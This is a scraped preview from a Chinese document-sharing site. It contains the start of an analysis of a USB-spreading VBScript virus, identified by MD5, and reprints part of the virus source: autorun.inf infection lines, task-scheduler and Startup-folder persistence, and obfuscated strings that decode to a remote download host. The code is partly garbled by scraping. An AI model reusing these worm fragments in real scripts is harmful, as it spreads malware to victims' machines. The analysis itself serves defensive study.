- 1、本文档共10页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
vbs病毒分析
病毒名称:.vbs
MD5: 64ea1c0e8f653984f0fde25b77f8494f
此病毒是VBS脚本病毒,多重加密,通过U盘进行传播感染,设置注册表自启动,每过一段时间运行,通过设置特定条件,进行其他恶意行为。网上卸载其他恶意程序并执行。破坏系统隐藏属性。
整理一下主主体代码:
j=\
:til=SY ‘autorun.inf中的节名
:btj=900:
vs=.vbs
:ve=.vbe
:cm=%comspec% /c ‘cmd
:dfo=/u#t/
:inf=\autorun.inf ‘自启动文件
set ws=createobject(wscript.shell):
set fso=createobject(scripting.filesystemobject)
set wmi=getobject(winmgmts:\\.\root\cimv2):
set sis=wmi.execquery(select * from win32_operatingsystem)
set dc=fso.drives:
set ats=wmi.execquery(select * from win32_service where name=Schedule)
for each atc in ats:
cat=atc.state:
next:
if cat=Stopped then ws.run net start task scheduler,0,false
ouw=wscript.scriptfullname: scriptfullname
win=fso.getspecialfolder(0)j: C:\WINDOWS
dir=fso.getspecialfolder(1)j C:\WINDOWS\system32
tmp=fso.getspecialfolder(2)j: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
wbe=dirwbem\:
mir=left(ouw,len(ouw)-len(wscript.scriptname))
cnr=\computername:
cnp=HKLM\system\currentcontrolset\controlcnrcnrcnr:
cna=rr(cnp,0):
if cna= then cna=til
wsc=wscript.exe
csc=cscript.exe
css=csc //nologo
wsr=rn:createobject(wscript.shell).run
c=vbcrlf
-----------------inc------------------------
SY[autorun]
open=wscript.exe .\.vbsshell\open\command=wscript.exe .\.vbs
shell\open\default=1
inc=tilc[autorun]copen=wsc .\vscshell\open\command=wsc .\vscshell\open\default=1
-----------------inc------------------------
sf=shell folders\:
rop=\software\microsoft\windows\currentversion\explorer\:
dap=rr(HKCUropsfdesktop,0)j C:\Documents and Settings\Administrator\桌面\
rpa=HKLM\software\cnaj: HKLM\software\QUBY-9B3768E839\
fsp=rr(HKLMropsfcommon startup,0)jvs: C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbs
fap=rr(HKCUropsffavorites,0)j C:\Documents and Settings\Administrator\Favorites\
ht=ec(ivwt?56): http\\
ha=ec(:;9:75kw9): 996628.cn/
hb=hl1;=6xhlr; |1;=6x|r;
hc=0dwuEpE: 0dwuEpE
hd=ec($+hc): #.asp?i=
he=ec(c+hc) b.asp?i=
rsp=HK
您可能关注的文档
- SQLServer中已满事务日志原因的检测.doc
- SQLServer和Oracle的常用函数对比.doc
- SQLServer数据库sa用户密码相关问题解决方法.doc
- SQLServer的安装和管理.pdf
- sqlserver程序设计基础.xls
- SQLServer管理常用的SQL与TSQL.pdf
- SQL中Case的使用方法.pdf
- SQL数据库备份的VC实现.docx
- SQL试题.doc
- SQL考点专题.doc
- 江西省抚州市临川区2025届中考考前最后一卷历史试卷含解析.doc
- 黑龙江哈尔滨市道里区2025届中考四模历史试题含解析.doc
- 2025届北京市密云区冯家峪中学中考生物五模试卷含解析.doc
- 辽宁省锦州市名校2025届中考一模历史试题含解析2.doc
- 河北省石家庄精英中学2025届中考历史模拟试卷含解析.doc
- 福建省南安市2025届中考历史全真模拟试题含解析.doc
- 广东省揭阳市普宁市普宁市占陇华南校2025届中考历史适应性模拟试题含解析.doc
- 2025届江西省上饶中考适应性考试历史试题含解析.doc
- 内蒙古呼伦贝尔满洲里市重点名校2025届中考历史猜题卷含解析.doc
- 施工企业合规风险识别与管理授课(王琦律师)chuan.pptx
最近下载
- 2025年郑州旅游职业学院单招职业技能考试题库推荐.docx VIP
- 锐角三角函数复习课PPT课件.pptx
- 2025年郑州铁路职业技术学院单招职业适应性测试题库(名师系列).docx VIP
- 2025年全国文物行业职业技能大赛北京市选拔赛理论参考题库答案(陶瓷文物修复师339题).docx VIP
- 2024年高考英语读后续写真题试题分析及范文讲义.pdf
- 规培考试之公共理论试题库(含答案).docx VIP
- 车辆维修服务方案1.docx
- 铆工讲义1__基础知识,工具,基本划线.ppt
- 凯捷-长安汽车平衡计分卡项目建议书-20130310.pdf VIP
- 如何提高企业员工忠诚度.ppt VIP
文档评论(0)